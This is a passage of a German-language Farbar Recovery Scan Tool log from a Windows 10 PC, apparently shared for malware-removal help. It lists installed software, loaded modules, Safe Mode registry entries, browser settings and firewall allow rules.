Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 (HKLM-x32\...\{462f63a8-6347-4894-a1b3-dbfe3a4c981d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Mozilla Firefox 84.0.2 (x64 de) (HKLM\...\Mozilla Firefox 84.0.2 (x64 de)) (Version: 84.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0.2 - Mozilla)
Mozilla Thunderbird 78.6.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 78.6.0 (x86 de)) (Version: 78.6.0 - Mozilla)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
MyEpson Portal (HKLM-x32\...\{3361D415-BA35-4143-B301-661991BA6219}) (Version: 1.1.2.2 - SEIKO EPSON CORPORATION) Hidden
MyEpson Portal (HKLM-x32\...\MyEpson Portal) (Version:  - SEIKO EPSON Corporation)
mz-32 Simulator version 1.0 (HKLM-x32\...\{02920757-F57F-4724-83CC-A99C827792E2}_is1) (Version: 1.0 - Graupner)
Naviextras Toolbox Prerequesities (HKLM-x32\...\{537575D6-3B96-474C-BD8F-DFF667363DBD}) (Version: 1.0.0 - NNG Llc.)
Nero Suite (HKLM-x32\...\NeroMultiInstaller!UninstallKey) (Version:  - )
NVIDIA 3D Vision Controller-Treiber 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA Grafiktreiber 456.71 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 456.71 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.38.35 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.38.35 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.18.0907 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.18.0907 - NVIDIA Corporation)
Photo & Graphic Designer Update (HKLM\...\{41D70490-924E-470F-847F-CD3BB1A65637}) (Version: 12.5.1.48446 - MAGIX Software GmbH) Hidden
Pinnacle Instant DVD Recorder (HKLM-x32\...\{EF781A5C-58F5-4BFD-87F9-E4F14D382F25}) (Version: 2.00.088 - )
PIXMA Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version:  - )
proDAD Heroglyph 2.5 (HKLM-x32\...\proDAD-Heroglyph-2.5) (Version:  - )
proDAD Vitascene 1.0 (HKLM-x32\...\proDAD-Vitascene-1.0) (Version:  - )
Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 5.1.0.1120 - Samsung Electronics)
simpliclean (HKLM-x32\...\simplitec POWER SUITE_is1) (Version: 2.4.4.68 - simplitec GmbH)
Studio 11 (HKLM-x32\...\{110B1ADF-2EAE-4E8F-B501-D2A1E6D8ED9D}) (Version: 11.0 - Pinnacle Systems)
Studio 11 (HKLM-x32\...\{2F952048-3220-4AC7-A206-D01EFC774BB2}) (Version: 11.0.0.0 - Pinnacle Systems) Hidden
Studio 11 Bonus DVD (HKLM-x32\...\{45A1BF92-700A-4408-B95E-79F462E3D67D}) (Version: 11.0.0.0 - Pinnacle Systems)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{16AD6161-2E47-4BF1-AA77-0946EFE93E08}) (Version: 2.61.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM\...\{E1D7CB46-BAE9-4D58-99C4-582332B1755A}) (Version: 1.13.0.0 - Microsoft Corporation) Hidden
WebAdvisor von McAfee (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.1.1.177 - McAfee, LLC)
Windows 10-Update-Assistent (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22395 - Microsoft Corporation)
Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version:  - )
Windows-Treiberpaket - Silicon Laboratories Inc. (silabser) Ports  (05/23/2018 6.7.6.2130) (HKLM\...\C9C3E5CCB43EEF685DD0E2BB4263DDC88C9B3834) (Version: 05/23/2018 6.7.6.2130 - Silicon Laboratories Inc.)
Yahoo! Desktop Login (HKLM-x32\...\{F9AEEC34-CF00-4CBD-9E36-DF9DC4002685}) (Version: 1.00.0001 - Pinnacle Systems) Hidden

Packages:
=========
Candy Crush Soda Saga -> C:\Program Files\WindowsApps\king.com.CandyCrushSodaSaga_1.176.200.0_x86__kgqvnymyfvs32 [2020-09-05] (king.com)
Fotos-Add-On -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2017.39121.36610.0_x64__8wekyb3d8bbwe [2018-09-13] (Microsoft Corporation)
Ihr Smartphone -> C:\Program Files\WindowsApps\Microsoft.YourPhone_1.20081.117.0_x64__8wekyb3d8bbwe [2020-09-05] (Microsoft Corporation)
Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-09-30] (Microsoft Corporation)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-13] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-13] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x64__8wekyb3d8bbwe [2020-08-20] (Microsoft Studios) [MS Ad]
Twitter -> C:\Program Files\WindowsApps\9E2F88E3.Twitter_6.1.4.1000_neutral__wgeqdkkx372wm [2018-09-08] (Twitter Inc.)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-716491260-3257532223-3478221735-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\Peter\AppData\Local\GoToMeeting\17359\G2MOutlookAddin64.dll => Keine Datei
ContextMenuHandlers1: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => C:\Program Files\McAfee\MSC\McCtxMenuFrmWrk.dll [2020-11-04] (McAfee, LLC -> McAfee, LLC)
ContextMenuHandlers2-x32: [InCDMenu] -> {950FF917-7A57-46BC-8017-59D9BF474000} => C:\Program Files (x86)\Ahead\InCD\incdshx.dll [2004-11-26] (Ahead Software AG) [Datei ist nicht signiert]
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\atiacm64.dll [2015-08-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} =>  -> Keine Datei
ContextMenuHandlers5-x32: [InCDMenu] -> {950FF917-7A57-46BC-8017-59D9BF474000} => C:\Program Files (x86)\Ahead\InCD\incdshx.dll [2004-11-26] (Ahead Software AG) [Datei ist nicht signiert]
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2020-10-01] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => C:\Program Files\McAfee\MSC\McCtxMenuFrmWrk.dll [2020-11-04] (McAfee, LLC -> McAfee, LLC)

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Drivers32: [VIDC.MJPG] => C:\Windows\SysWOW64\Pvmjpg30.dll [401408 2005-07-12] (Pegasus Imaging Corporation) [Datei ist nicht signiert]

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

Shortcut: C:\Users\Peter\Favorites\Downloadseite von NCH Software.lnk -> hxxp://www.nchsoftware.com/de/index.htm
ShortcutWithArgument: C:\Users\Peter\Desktop\Photovoltaik.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> "hxxp:\\192.168.0.2"

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2018-06-14 11:18 - 2018-06-14 11:18 - 000011776 _____ () [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\libEGL.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 002013696 _____ () [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\libGLESv2.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000739840 _____ () [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QtQuick\Controls\qtquickcontrolsplugin.dll
2017-06-17 08:46 - 2007-04-30 02:50 - 000084992 _____ (CANON INC.) [Datei ist nicht signiert] C:\Program Files\Canon\MyPrinter\BJMyRes.dll
2017-06-17 08:46 - 2007-04-04 02:50 - 000104448 _____ (CANON INC.) [Datei ist nicht signiert] C:\Program Files\Canon\MyPrinter\cnmpu.dll
2015-12-17 10:11 - 2015-12-17 10:11 - 000132096 _____ (Seiko Epson Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON Software\Event Manager\epnsm.dll
2009-10-21 16:39 - 2009-10-21 16:39 - 000291328 _____ (SEIKO EPSON CORPORATION) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON Software\Event Manager\LcMgr.dll
2019-02-22 16:01 - 2019-02-22 16:01 - 000704512 _____ (Seiko Epson Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON\MyEpson Portal\Configration_00000171\MepCfg.dll
2020-04-17 09:15 - 2020-04-17 09:15 - 000577536 _____ (Seiko Epson Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON\MyEpson Portal\MepUploader_00000542\MepUploader.dll
2019-02-22 14:09 - 2019-02-22 14:09 - 000475136 _____ (Seiko Epson Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON\MyEpson Portal\Online Manual_00000013\MepFAQ.dll
2018-09-18 11:43 - 2018-09-18 11:43 - 000213504 _____ (simplitec GmbH) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\MrStyler.dll
2018-09-18 11:43 - 2018-09-18 11:43 - 000288256 _____ (simplitec GmbH) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\MrTracker.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000045568 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\bearer\qgenericbearer.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000047616 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\bearer\qnativewifibearer.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000049664 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qdds.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000029696 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qgif.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000037376 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qicns.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000030208 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qico.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000459776 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qjp2.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000236544 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qjpeg.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000275456 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qmng.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000023552 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qsvg.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000022528 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qtga.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000351744 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qtiff.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000021504 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qwbmp.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000374784 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qwebp.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 001212928 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\platforms\qwindows.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 005500416 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Core.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 005804544 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Gui.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 001064448 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Network.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 003189248 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Qml.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 002928128 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Quick.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000310784 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Svg.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 005446144 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Widgets.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000015360 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QtQuick.2\qtquick2plugin.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000072192 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QtQuick\Layouts\qquicklayoutsplugin.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000015360 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QtQuick\Window.2\windowplugin.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ModuleCoreService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ModuleCoreService => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
SearchScopes: HKU\S-1-5-21-716491260-3257532223-3478221735-1001 -> {70A7EBAE-DA5A-4BBF-ADEA-6ECF768BF958} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=MGX&o=15359&src=kw&q={searchTerms}&locale=de_DE&apn_ptnrs=^JQ&apn_dtid=^YYYYYY^YY^DE&apn_uid=79DE322B-A6B7-46C4-ACAD-51A5594CEA42&apn_sauid=ADB29B8A-9FD7-4DC6-9AFE-C5F3256C5419
BHO: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll [2020-12-18] (McAfee, LLC -> McAfee, LLC)
BHO-x32: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll [2020-12-18] (McAfee, LLC -> McAfee, LLC)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~2\mcafee\SITEAD~1\mcieplg.dll Keine Datei
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files\McAfee\MSC\McSnIePl64.dll [2020-11-04] (McAfee, LLC -> McAfee, LLC)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2020-11-04] (McAfee, LLC -> McAfee, LLC)

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2016-07-16 12:47 - 2016-07-16 12:45 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-716491260-3257532223-3478221735-1001\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: Datenträger ist nicht mit dem Internet verbunden.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
 ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{65781923-5A50-4B8F-9101-B10D258E3705}] => (Allow) C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QMxNetworkSync.exe (MAGIX Software GmbH -> MAGIX)
FirewallRules: [{2EA6A397-2399-407F-8DA7-CC979FB10EC2}] => (Allow) C:\Program Files\Common Files\MAGIX Services\MxCloudSync\MxCloudSync.exe (MAGIX Software GmbH -> MAGIX)
FirewallRules: [{DBAEB576-2FBB-4C5E-887D-253C7D978253}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
FirewallRules: [{DC1C1F3B-A31C-4ABF-9DB8-BAA499E6EC29}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
FirewallRules: [{7FEA5C8B-41AA-47AA-AB42-EE8B98EEC153}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{EFC05FE9-0631-47C8-8829-F88236543D1D}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{1DBD2E7A-D78B-4AC9-A081-F7C38FD80ABE}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{33BC60E0-F131-4EAF-847C-CB0EE0CF51E6}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{85CE0E62-F6F7-4BE1-89B8-D5AB0178F2D1}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{FF2976C1-4A2F-4F5F-819D-51D8720A3178}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{0C5DC20B-9CA3-4A7C-AC9F-6056E23A9757}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{66B29A8C-1662-4154-A30B-FEC1CBCD797E}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{7A080F98-A3E2-4F5A-B0CB-9CB65CD2C503}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{CDFC0017-575A-46DE-9133-409AFBD62C39}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{B5723925-285D-43DA-AB87-174217C0698C}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\PowerSuite.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{AE62C13B-87AE-4478-98E4-94E0B9B5DA6D}] => (Allow) C:\Program Files (x86)\simplitec\simplitec\simpliclean\PowerSuite.exe (Simplitec GmbH -> simplitec GmbH)
FirewallRules: [{83B73CBC-B790-4630-AB96-4313987A6044}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe => Keine Datei
FirewallRules: [{089F6DD6-FFB4-4EE6-90BC-133177D6DB95}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe => Keine Datei
FirewallRules: [{E78384C4-42D9-447E-AB1C-6BD6707DC1F8}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe => Keine Datei
FirewallRules: [{07FA2E7B-A038-44BB-9C18-177704A48D70}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe => Keine Datei
FirewallRules: [{CE82E4DB-AC72-4603-BBF5-1FECC3641F49}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe => Keine Datei
FirewallRules: [{6481F0B3-4C3F-4335-A528-FE731D96F7AC}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe => Keine Datei
FirewallRules: [{0C53BEA4-423A-4FD4-A758-11806EDE4BC3}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{4B6DE64A-FDB2-4816-8BEF-E90AB2088FFF}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{9CCB3E66-27F4-4B2D-839F-D41BA8498057}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{4B07794B-8FE7-47C2-930F-0986D4C3C844}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{C6170BB2-9C85-45B7-A663-0C7F92A8D7C0}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{535E7441-07E0-4363-A4DE-4CB15D2E4B7B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{A6E67A19-69AC-4849-97BF-ADEA71F81C1E}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\umi.exe (Pinnacle Systems) [Datei ist nicht signiert]
FirewallRules: [{C28CB5C2-93DC-4E31-8755-850AE874974F}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\umi.exe (Pinnacle Systems) [Datei ist nicht signiert]
FirewallRules: [{4E11A4E0-B35E-499C-820E-3316A698B307}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\PMSRegisterFile.exe () [Datei ist nicht signiert]
FirewallRules: [{DEFB9033-AC35-43D8-9852-53F9CA3FB3DC}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\PMSRegisterFile.exe () [Datei ist nicht signiert]
FirewallRules: [{8C086B40-D8F0-4F42-A5AF-6ED7075EBCE4}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\Studio.exe (Pinnacle Systems) [Datei ist nicht signiert]
FirewallRules: [{46FED456-01B9-4FDA-AAA7-30B031C8D13B}] => (Allow) C:\Program Files (x86)\Pinnacle\Studio 11\programs\Studio.exe (Pinnacle Systems) [Datei ist nicht signiert]
